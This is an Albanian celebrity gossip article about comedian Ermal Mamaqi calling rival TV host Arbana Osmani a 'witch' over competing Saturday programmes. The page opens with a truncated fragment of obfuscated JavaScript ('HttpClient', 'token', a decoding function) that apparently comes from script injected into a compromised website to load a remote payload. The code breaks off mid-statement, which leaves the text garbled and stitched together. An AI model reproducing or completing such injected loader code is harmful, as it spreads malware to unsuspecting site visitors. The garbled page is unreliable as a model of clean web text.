;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ermal Mamaqi e quan ‘shtrigë’ kolegen e tij

By

Debutimi televiziv i Ermal Mamaqit me ‘Xing’ në televizionin Klan ishte goxha i suksesshëm në fillim të sezonit.

Humoristi kishte përqindjen dërmuese të audiencës me risinë që solli të Shtunave por edhe programin e dobët të kanaleve konkurente, Top Channel dhe Vizion Plus.

Gjërat ndryshuan në mes të rrugës kur Arbana Osmani nisi programin ‘Dua të të bëj të lumtur’ e më pas ‘Big Brother’ që rindanë tortën e audiencës.

Relacioni me rivalen ishte marrë me humor teksa në një fotografi Ermali madje shihej duke e kapur për fyti kolegen.

E ‘ngacmimeve’ i është rikthyer sërish në videon e fundit të Arbanës e cila paralajmëron rikthimin në ekran me ‘Dua të të bëj të lumtur’.

‘Hë tani… prapë të shtunën e ke? hë shtrigë’ – ka deklaruar Mamaqi në postimin e bërë.

Mbetet të shihet nëse ndonjë ndërrim eventual i orarit të transmetimit në Top Channel do e ‘çlirojë’ Ermalin nga ky ‘makth’/Prive.al/

Coming soon?

A post shared by Arbana Osmani (@arbanao) on

Artikuj të ngjashëm